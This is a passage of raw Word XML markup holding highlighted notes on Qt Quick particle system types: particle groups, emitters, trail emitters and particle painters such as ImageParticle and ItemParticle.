          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Particles can </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>either</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> have their </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>group changed by an Affector</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stochastic state transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be defined in a</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1832" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleGroup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="00791A59" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Generally, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>groups should only be defined in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1833" w:history="1">
        <w:r w:rsidRPr="00E85C50">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleGroup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>they require stochastic state transitions</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Otherwise</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sufficient to have the groups be defined simply by the strings used in the particle/particles </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1440" w:name="_Toc483000840"/>
      <w:bookmarkStart w:id="1441" w:name="_Toc483003833"/>
      <w:bookmarkStart w:id="1442" w:name="_Toc483604186"/>
      <w:bookmarkStart w:id="1443" w:name="_Toc483605406"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Emitters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1440"/>
      <w:bookmarkEnd w:id="1441"/>
      <w:bookmarkEnd w:id="1442"/>
      <w:bookmarkEnd w:id="1443"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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Emitters </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emit logical particles into the system</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These particles </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have a trajectory and lifespan</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>no visualization</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These particles are </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emitted from the location</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the Emitter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TrailEmitters</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a special type of emitter which emits particles from the location of other logicial particles. Any logical particle of the followed type within the bounds of a</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1834" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TrailEmitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will cause particle emission from its location, as if there were an Emitter on it with the same properties as the</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1835" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TrailEmitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1444" w:name="_Toc483000841"/>
      <w:bookmarkStart w:id="1445" w:name="_Toc483003834"/>
      <w:bookmarkStart w:id="1446" w:name="_Toc483604187"/>
      <w:bookmarkStart w:id="1447" w:name="_Toc483605407"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ParticlePainters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1444"/>
      <w:bookmarkEnd w:id="1445"/>
      <w:bookmarkEnd w:id="1446"/>
      <w:bookmarkEnd w:id="1447"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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Painters are the types that </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visualize logical particles</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For each logical particle in the groups assigned to it, which are within its bounds (or outside, if you do not set the clip property on the type) it will be visualized in a manner dependent on the type of</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1836" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base type</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1837" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>does not draw</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> anything.</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1838" w:history="1">
        <w:r w:rsidRPr="00791A59">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ImageParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>renders an image at the particle location.</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1839" w:history="1">
        <w:r w:rsidRPr="00791A59">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CustomParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows you to write your own shaders to render the particles, passing in the logical particle state as vertex data.</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1840" w:history="1">
        <w:r w:rsidRPr="00791A59">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ItemParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allows you to visualize logical particles using arbitrary QML delegates. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ModelParticle</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is similar, but coordinates model data amongst the delegates in a similar manner to the view classes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As the</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1841" w:history="1">
        <w:r w:rsidRPr="000437DC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is the QML type visualizing the particles in the scene, it is its </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Z value which is important when</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> trying to place particles above or below other types visually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
